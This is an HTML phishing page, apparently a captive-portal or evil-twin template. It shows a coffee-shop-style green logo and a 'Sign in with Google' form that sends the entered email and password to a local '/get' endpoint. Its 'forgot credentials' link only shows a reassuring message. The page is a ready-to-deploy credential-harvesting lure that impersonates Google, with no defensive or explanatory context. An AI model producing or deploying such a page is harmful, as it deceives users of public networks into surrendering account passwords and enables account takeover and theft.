<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #00704A;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #00704A;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #00704A;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
}

.submit-btn:hover {
  background: #00704A;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
  <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="250.000000pt" height="200.000000pt" viewBox="0 0 1920.000000 1080.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,1080.000000) scale(0.100000,-0.100000)"
fill="#00704A" stroke="none">
<path d="M0 5400 l0 -5400 9600 0 9600 0 0 5400 0 5400 -9600 0 -9600 0 0
-5400z m9649 4725 c44 -105 96 -225 119 -275 11 -25 32 -74 47 -110 59 -146
62 -150 98 -150 60 0 621 -40 625 -45 4 -4 -42 -49 -124 -120 -203 -177 -354
-312 -358 -322 -3 -7 8 -45 24 -85 40 -102 160 -417 160 -422 0 -2 7 -20 15
-40 l15 -37 88 76 c233 202 496 328 835 400 154 32 227 40 227 26 0 -7 -17
-38 -39 -69 -127 -188 -271 -474 -352 -697 -25 -68 -24 -73 9 -43 100 93 348
216 542 270 117 32 148 38 255 53 101 13 127 9 103 -16 -7 -8 -46 -58 -86
-112 -148 -199 -315 -472 -416 -681 -31 -65 -63 -125 -71 -132 -22 -23 -49
-17 -152 34 -54 26 -132 60 -173 76 -41 16 -88 35 -105 42 -61 27 -284 96
-415 129 -181 45 -273 61 -560 96 -148 19 -577 16 -755 -5 -458 -54 -838 -164
-1282 -373 -63 -29 -73 -19 -166 164 -46 93 -110 211 -142 263 -32 52 -69 113
-82 135 -13 22 -51 78 -84 125 -33 47 -71 101 -84 120 -13 19 -42 57 -64 85
-22 27 -38 52 -35 54 17 17 283 -29 414 -71 88 -29 145 -52 260 -107 52 -25
59 -29 160 -95 41 -27 78 -54 82 -60 4 -6 10 -7 14 -4 8 9 -74 212 -147 363
-68 139 -108 211 -195 352 -35 55 -64 104 -64 108 0 4 24 4 53 0 418 -53 794
-220 1051 -467 22 -21 43 -35 48 -30 4 4 23 50 42 102 19 52 56 149 81 215 26
66 58 151 71 188 l25 68 -58 53 c-32 29 -125 113 -208 186 -82 73 -168 149
-190 169 l-40 36 90 8 c50 5 200 16 335 25 l245 17 32 75 c18 41 41 95 52 120
11 25 32 74 46 110 15 36 33 76 40 90 8 14 28 61 45 104 38 93 52 118 62 108
4 -4 20 -39 37 -77z m-3912 -2119 c227 -171 410 -468 474 -768 7 -32 14 -58
16 -58 3 0 35 18 71 39 215 127 534 198 775 173 142 -15 357 -70 357 -91 0 -3
-17 -17 -38 -31 -33 -22 -280 -218 -308 -244 -237 -222 -480 -494 -591 -662
-20 -30 -41 -54 -47 -54 -7 0 -54 9 -106 21 -61 13 -132 21 -200 21 -210 1
-378 -49 -748 -223 -57 -27 -107 -49 -111 -49 -4 0 -25 -9 -47 -19 -62 -30
-213 -71 -298 -80 -75 -9 -214 1 -243 17 -9 6 -1 20 28 52 105 115 180 201
235 270 32 41 61 77 65 80 3 3 29 37 57 75 28 39 55 75 60 80 21 26 125 189
169 265 97 167 150 284 210 465 67 201 84 302 90 540 3 112 10 205 15 213 19
22 56 12 115 -32z m7851 32 c5 -7 12 -102 15 -213 4 -166 9 -220 31 -315 49
-222 89 -332 202 -565 60 -124 283 -468 349 -539 6 -6 26 -31 45 -56 19 -25
37 -47 40 -50 3 -3 16 -18 29 -35 12 -16 57 -67 99 -114 138 -151 133 -144
114 -156 -26 -15 -226 -19 -295 -5 -71 13 -163 41 -222 65 -83 35 -380 167
-390 173 -14 9 -64 28 -170 63 -225 75 -385 83 -604 32 l-74 -17 -16 24 c-21
32 -104 144 -111 150 -3 3 -27 32 -52 65 -169 222 -453 501 -692 678 -50 37
-91 73 -91 79 0 14 93 43 220 69 87 18 123 20 275 16 219 -7 313 -27 500 -105
47 -20 110 -51 140 -69 30 -18 57 -29 61 -25 3 4 12 34 19 67 52 244 179 477
354 650 64 64 89 85 151 130 25 18 59 19 73 3z m-3819 -288 c361 -46 674 -262
785 -543 15 -38 25 -76 22 -84 -7 -17 -12 -16 -121 17 -52 16 -99 22 -185 23
-183 3 -316 -40 -424 -136 -38 -34 -50 -53 -62 -97 -26 -101 -36 -234 -25
-330 11 -84 46 -220 57 -220 12 0 50 24 61 39 6 9 24 41 39 71 14 30 33 63 42
73 20 23 74 22 142 -3 113 -42 262 -35 332 16 44 33 75 30 112 -10 42 -44 56
-94 56 -204 0 -166 -49 -355 -143 -552 -39 -82 -152 -259 -199 -311 -71 -79
-89 -98 -139 -144 -179 -163 -325 -228 -514 -228 -149 -1 -274 44 -420 149
-73 52 -204 185 -273 276 -52 70 -122 182 -122 198 0 4 -3 10 -8 12 -4 2 -22
35 -39 73 -94 207 -126 341 -127 525 -1 111 2 141 17 167 38 71 93 78 220 29
86 -33 148 -33 252 -1 113 35 154 33 233 -11 35 -20 67 -32 71 -28 36 42 49
280 22 402 -12 55 -20 68 -66 111 -55 49 -121 86 -215 117 -84 29 -309 27
-405 -3 -108 -33 -111 -33 -107 2 15 126 166 323 327 426 33 21 65 42 70 46
26 21 179 83 253 102 150 40 321 51 481 31z m-1041 -132 c2 -12 -58 -113 -78
-128 -13 -11 -92 -143 -134 -227 -109 -217 -163 -474 -153 -733 8 -225 51
-375 202 -720 135 -307 170 -399 208 -549 31 -127 31 -373 -1 -485 -46 -159
-107 -266 -283 -491 -237 -303 -287 -417 -276 -632 9 -187 70 -325 300 -670
268 -405 327 -546 327 -787 0 -106 -31 -250 -75 -351 -12 -27 -30 -70 -41 -95
-10 -25 -70 -148 -131 -273 -62 -125 -113 -230 -113 -233 0 -3 -11 -30 -25
-61 -78 -169 -131 -412 -118 -538 l6 -55 -34 6 c-35 7 -292 84 -343 104 l-28
10 7 88 c8 111 28 209 59 294 43 118 115 280 176 393 84 159 203 401 228 465
51 132 65 208 59 325 -5 87 -12 127 -35 191 -29 79 -98 222 -133 274 -356 532
-439 709 -439 945 0 159 42 284 150 450 29 44 55 82 59 85 3 3 18 21 33 42 15
20 34 42 41 50 7 7 55 69 107 138 210 280 267 489 210 769 -29 142 -54 217
-143 426 -96 225 -118 279 -151 378 -52 155 -68 257 -68 433 0 168 15 272 63
429 84 272 256 525 483 709 58 47 78 53 84 24z m1854 -20 c119 -93 262 -257
346 -396 216 -358 262 -808 123 -1212 -33 -98 -82 -217 -161 -395 -103 -231
-135 -367 -135 -570 0 -159 13 -222 68 -335 22 -44 134 -220 147 -230 10 -8
128 -163 209 -273 221 -305 249 -553 99 -876 -47 -102 -80 -158 -213 -361
-132 -201 -134 -206 -200 -334 -87 -169 -100 -216 -100 -376 0 -132 1 -138 39
-245 22 -60 96 -220 164 -355 150 -294 161 -316 200 -405 74 -169 112 -324
112 -453 l0 -77 -188 -58 c-103 -31 -190 -57 -194 -57 -5 0 -8 47 -8 105 0
218 -55 383 -270 814 -182 365 -233 518 -233 691 0 232 66 389 325 778 155
230 229 364 269 479 31 92 33 106 33 233 0 130 -1 138 -33 220 -19 47 -39 92
-46 100 -6 8 -24 36 -39 62 -14 26 -61 91 -103 145 -148 190 -170 219 -206
275 -112 176 -157 326 -157 521 0 204 43 366 182 682 22 50 46 104 53 120 7
17 22 50 34 75 45 100 103 260 126 350 39 158 48 242 41 396 -16 340 -104 595
-298 867 -75 104 -88 137 -54 137 8 0 38 -19 68 -42z m-2272 -93 c0 -3 -21
-31 -46 -63 -63 -78 -63 -78 -119 -162 -27 -41 -53 -77 -56 -80 -12 -11 -128
-259 -148 -315 -57 -166 -88 -402 -78 -590 8 -146 44 -297 118 -502 178 -489
193 -550 193 -773 0 -133 -2 -152 -28 -225 -48 -138 -160 -322 -272 -447 -16
-18 -36 -43 -44 -54 -8 -12 -40 -55 -71 -95 -118 -158 -168 -251 -199 -374
-18 -71 -21 -106 -17 -167 15 -187 77 -327 297 -673 214 -335 268 -453 291
-635 25 -192 -38 -388 -245 -760 -151 -271 -245 -502 -268 -656 -6 -44 -14
-82 -17 -86 -3 -4 -62 20 -130 53 -68 32 -127 59 -132 59 -5 0 -9 13 -9 29 0
33 25 163 39 201 53 143 100 247 218 481 202 400 222 454 230 604 10 181 -44
325 -230 621 -170 269 -265 454 -299 584 -29 110 -31 284 -5 380 25 94 109
261 154 308 7 7 13 17 13 22 0 5 6 15 13 22 6 7 54 69 106 138 52 69 97 127
100 130 17 15 71 90 71 99 0 5 4 11 8 13 13 5 87 129 110 185 81 192 67 394
-53 718 -104 282 -149 460 -165 650 -36 430 126 874 435 1188 92 93 235 198
235 172z m2689 -39 c249 -168 461 -491 553 -846 26 -101 30 -138 35 -303 8
-267 -14 -385 -134 -732 -113 -328 -125 -378 -127 -545 -1 -150 6 -186 52
-280 17 -36 107 -184 123 -204 5 -6 31 -40 59 -76 27 -36 53 -69 58 -75 70
-88 194 -260 224 -313 168 -296 169 -519 1 -855 -29 -60 -58 -114 -64 -120 -5
-7 -25 -37 -43 -67 -18 -30 -72 -119 -119 -197 -166 -273 -210 -389 -210 -543
0 -81 18 -176 48 -245 7 -16 24 -57 38 -90 14 -33 88 -184 165 -337 76 -152
155 -320 174 -375 40 -109 71 -240 66 -272 -2 -17 -32 -35 -130 -81 -70 -33
-132 -60 -138 -60 -5 0 -10 11 -10 25 0 49 -32 181 -67 275 -36 99 -149 337
-191 404 -37 59 -201 385 -211 420 -5 17 -20 65 -32 106 -32 108 -32 264 -1
380 32 117 124 304 227 460 235 358 309 507 336 684 21 131 -14 282 -96 425
-28 48 -143 210 -179 252 -52 60 -184 237 -220 293 -41 64 -88 164 -109 231
-19 60 -22 91 -21 225 1 212 23 307 154 660 131 350 153 452 153 690 1 191
-16 313 -60 453 -50 159 -135 331 -225 454 -21 29 -38 56 -38 62 0 5 -4 11 -8
13 -5 2 -32 33 -60 70 -74 96 -71 99 27 34z m-3155 -206 c-53 -59 -166 -234
-223 -344 -71 -139 -93 -190 -125 -291 -54 -174 -61 -226 -61 -455 1 -244 7
-283 104 -600 94 -313 117 -438 108 -600 -8 -163 -70 -294 -254 -537 -53 -70
-99 -130 -103 -133 -3 -3 -37 -48 -74 -100 -37 -52 -72 -102 -79 -110 -20 -26
-84 -151 -107 -210 -34 -85 -39 -257 -11 -375 24 -103 80 -240 163 -403 31
-62 55 -118 52 -125 -15 -34 -310 -257 -341 -257 -7 0 -13 -4 -13 -8 0 -9
-142 -78 -230 -113 -85 -32 -258 -69 -330 -69 -110 0 -142 28 -202 180 l-26
65 -41 -3 c-104 -7 -186 -58 -358 -221 -58 -55 -109 -101 -112 -101 -4 0 -42
50 -86 111 l-78 112 24 19 c22 18 149 130 173 153 36 35 139 107 183 129 29
14 85 33 125 41 39 9 73 17 75 19 3 3 -59 237 -72 269 -5 11 -2 17 6 17 34 0
199 21 244 31 143 31 403 149 471 214 6 6 34 28 62 50 29 21 52 42 52 45 0 3
2 46 4 95 9 200 112 388 419 765 166 204 247 363 247 484 0 68 -24 209 -54
326 -82 308 -116 457 -127 552 -16 148 -7 388 20 498 25 99 68 231 87 269 8
14 14 31 14 36 0 11 113 218 142 259 38 55 140 178 182 220 103 105 229 185
150 96z m3586 5 c72 -53 199 -192 275 -300 128 -185 221 -396 267 -609 26
-120 31 -385 10 -529 -13 -89 -71 -330 -116 -480 -41 -135 -59 -259 -54 -362
5 -83 9 -100 47 -176 42 -83 67 -119 327 -461 224 -296 284 -424 284 -603 0
-79 1 -83 33 -111 17 -16 55 -45 82 -64 28 -18 52 -36 55 -39 15 -17 208 -113
280 -140 79 -29 173 -49 286 -61 53 -6 99 -12 100 -13 3 -3 -51 -203 -70 -263
-6 -19 -2 -22 35 -28 47 -8 161 -44 169 -55 3 -3 21 -15 42 -25 20 -11 65 -45
101 -75 36 -31 99 -85 141 -121 42 -35 76 -68 76 -73 0 -18 -145 -217 -156
-214 -7 1 -66 54 -131 117 -123 118 -190 163 -278 186 -83 23 -89 20 -110 -39
-29 -82 -68 -149 -98 -171 -56 -41 -231 -28 -406 31 -65 21 -217 92 -293 135
-95 55 -328 238 -328 258 0 5 36 83 80 173 112 232 150 352 157 493 5 96 3
122 -16 185 -39 130 -107 250 -244 429 -128 167 -142 185 -148 190 -3 3 -35
49 -72 103 -78 114 -140 240 -156 315 -25 121 -3 372 49 545 11 37 29 97 40
134 11 37 29 93 40 125 40 117 71 297 77 458 5 132 2 174 -16 280 -27 155 -75
299 -151 455 -55 115 -220 376 -254 404 -16 13 -22 31 -10 31 4 0 28 -16 54
-35z m-2445 -267 c108 -24 220 -105 244 -177 10 -32 10 -33 -12 -28 -12 3 -65
15 -117 27 -149 34 -313 18 -368 -36 -18 -19 -31 -15 -55 18 -27 36 -37 99
-21 136 29 71 167 96 329 60z m1523 -18 c66 -37 77 -100 30 -177 -21 -36 -30
-39 -50 -20 -59 55 -209 72 -351 38 -119 -28 -117 -28 -117 19 0 46 28 77 103
116 80 41 143 54 248 51 78 -3 103 -8 137 -27z m-4250 -968 l33 -7 -53 -100
c-28 -55 -73 -149 -99 -209 l-47 -108 -114 -3 c-183 -4 -308 -42 -536 -161
-81 -42 -176 -91 -212 -109 -185 -93 -379 -145 -541 -145 -77 0 -90 2 -99 19
-6 12 -10 99 -10 214 l0 193 123 1 c215 0 329 36 687 214 250 125 384 178 505
198 33 6 71 13 85 15 34 6 237 -2 278 -12z m7094 -11 c134 -27 253 -75 508
-204 317 -161 467 -207 676 -207 l105 0 -1 -198 c-1 -109 -5 -204 -10 -212
-13 -22 -233 -6 -354 25 -122 31 -177 55 -459 199 -282 145 -352 167 -542 174
l-141 5 -18 46 c-11 25 -53 116 -95 201 -41 85 -76 160 -76 165 0 29 273 33
407 6z m-7390 -786 c3 -3 -8 -58 -24 -123 -17 -64 -35 -148 -42 -187 l-12 -70
-34 -3 c-173 -13 -276 -50 -505 -185 -269 -158 -407 -207 -587 -207 -65 0 -69
1 -79 27 -9 24 -37 180 -55 306 l-6 47 68 -6 c176 -16 347 39 624 201 206 120
346 175 495 194 85 10 150 13 157 6z m7477 -11 c62 -9 145 -30 201 -51 97 -36
192 -82 198 -95 2 -5 8 -8 14 -8 6 0 43 -19 82 -43 227 -137 381 -190 558
-191 75 -1 108 -5 108 -13 0 -25 -52 -317 -60 -339 -9 -22 -15 -24 -74 -24
-126 0 -291 45 -417 112 -35 19 -113 64 -174 99 -206 121 -315 163 -453 175
-63 6 -73 10 -76 28 -3 12 -21 95 -40 186 -20 91 -36 168 -36 173 0 11 52 8
169 -9z m-4029 -345 c62 -15 118 -21 205 -22 106 -1 134 3 240 32 164 45 192
50 230 40 50 -14 65 -39 94 -161 40 -166 114 -299 276 -498 178 -218 244 -369
245 -559 0 -206 -71 -365 -351 -781 -235 -348 -302 -507 -303 -710 0 -144 53
-310 183 -569 170 -338 256 -567 291 -776 13 -80 16 -334 3 -345 -4 -3 -42
-12 -83 -18 -542 -84 -1102 -87 -1595 -9 l-140 22 -8 55 c-18 129 18 385 79
563 43 127 86 231 96 235 5 2 8 9 8 17 0 7 30 73 66 146 203 410 258 585 235
751 -21 150 -80 290 -209 497 -36 58 -69 108 -72 111 -4 4 -166 250 -207 315
-60 94 -134 266 -154 353 -28 124 -2 330 54 437 44 83 148 234 191 278 31 31
167 230 194 284 34 68 67 165 82 246 22 112 73 139 200 105 36 -10 103 -27
150 -39z m-3578 -613 l-3 -164 -59 -6 c-125 -14 -252 -69 -413 -178 -50 -35
-94 -66 -97 -69 -9 -11 -124 -68 -179 -89 -34 -13 -82 -22 -124 -23 l-68 -2
-31 85 c-17 47 -38 112 -48 145 -10 33 -21 68 -25 78 -6 15 -1 17 36 17 67 0
175 26 243 58 34 16 124 68 201 117 227 143 351 192 495 194 l75 1 -3 -164z
m7734 153 c114 -20 226 -71 387 -175 196 -127 331 -184 439 -184 30 0 38 -4
38 -18 0 -23 -89 -294 -101 -306 -16 -17 -158 12 -233 48 -40 18 -112 60 -160
92 -241 162 -304 192 -456 215 l-80 12 0 164 0 163 53 0 c29 0 80 -5 113 -11z
m-7681 -854 c13 -66 24 -129 26 -140 4 -18 -3 -21 -76 -26 -44 -3 -96 -11
-115 -17 -56 -19 -149 -81 -243 -161 -118 -102 -188 -148 -237 -156 -23 -4
-43 -5 -44 -3 -10 11 -125 237 -130 254 -6 19 -2 23 31 29 52 9 148 64 241
138 42 34 79 64 82 67 10 10 86 58 130 80 66 34 176 59 249 57 l64 -2 22 -120z
m7723 96 c57 -19 164 -78 209 -115 146 -119 208 -161 280 -188 32 -12 60 -23
63 -25 10 -8 -135 -273 -150 -273 -46 0 -171 80 -275 175 -53 49 -160 118
-215 139 -25 10 -80 20 -122 23 -51 4 -78 10 -78 18 0 7 9 54 20 106 11 52 20
108 20 125 0 17 3 34 8 38 13 14 176 -2 240 -23z m-6165 -1023 c64 -117 80
-179 81 -313 1 -86 -4 -139 -17 -185 -24 -91 -119 -277 -232 -460 -116 -186
-186 -327 -217 -435 -12 -44 -23 -81 -24 -83 -6 -10 -214 123 -214 137 0 20
45 142 74 202 41 84 70 129 189 296 217 306 260 380 309 528 18 56 23 92 23
180 0 61 -4 129 -8 153 -5 23 -6 42 -4 42 3 0 21 -28 40 -62z m4386 30 c-5
-18 -12 -66 -15 -108 -16 -189 66 -394 264 -659 122 -163 214 -304 261 -399
43 -84 77 -200 64 -213 -4 -4 -53 -35 -107 -68 -103 -63 -115 -64 -116 -14 0
64 -87 252 -205 443 -198 320 -262 469 -272 628 -7 114 12 200 71 325 46 96
74 129 55 65z m-5528 -291 c49 -88 53 -107 21 -107 -40 0 -158 -94 -242 -192
l-85 -99 -82 87 c-46 48 -83 91 -83 95 0 20 182 206 245 249 63 43 158 81 168
67 4 -7 30 -52 58 -100z m6777 79 c75 -38 166 -111 234 -188 35 -39 69 -77 76
-84 10 -10 3 -24 -37 -71 -27 -32 -65 -74 -85 -93 l-36 -34 -32 39 c-66 83
-194 200 -251 229 -31 15 -57 33 -57 38 0 5 12 30 27 56 15 26 34 61 43 77 27
51 31 55 51 55 11 0 41 -11 67 -24z m-6476 -543 c23 -32 50 -67 60 -77 10 -11
18 -22 18 -25 0 -3 -26 -31 -58 -62 -64 -63 -142 -160 -142 -177 0 -33 -50 -1
-174 110 -21 19 -21 20 50 108 72 91 170 180 196 180 4 0 26 -26 50 -57z
m6175 -20 c70 -68 136 -144 156 -179 6 -10 -137 -139 -161 -146 -5 -2 -36 33
-69 77 -33 44 -79 97 -102 118 -23 21 -41 45 -39 52 5 22 111 155 124 155 6 0
47 -35 91 -77z"/>
<path d="M9540 8709 c-36 -28 -74 -58 -85 -67 -11 -10 -36 -28 -55 -42 -19
-13 -60 -44 -90 -68 -64 -51 -64 -51 -158 -121 -102 -77 -98 -87 29 -66 239
38 600 39 854 1 50 -8 93 -12 98 -9 20 12 25 8 -377 312 -39 29 -73 56 -76 60
-6 8 -68 51 -72 50 -2 0 -32 -23 -68 -50z"/>
<path d="M9402 6128 c-51 -27 -54 -56 -7 -71 17 -5 58 -20 92 -33 87 -34 155
-32 262 8 100 36 105 40 97 65 -10 30 -64 48 -136 45 -110 -5 -143 -5 -205 2
-50 5 -67 2 -103 -16z"/>
<path d="M9223 5809 c-9 -9 5 -31 65 -98 129 -145 202 -186 323 -185 103 0
172 39 292 164 53 56 97 105 97 110 0 16 -37 21 -81 10 -108 -26 -525 -23
-659 6 -14 3 -30 0 -37 -7z"/>
</g>
</svg>
  </div>

  <div class="form-container">

    <center><h1>Sign in with <b>Google</b></h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>

      <button class="submit-btn" type="submit">Continue</button>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
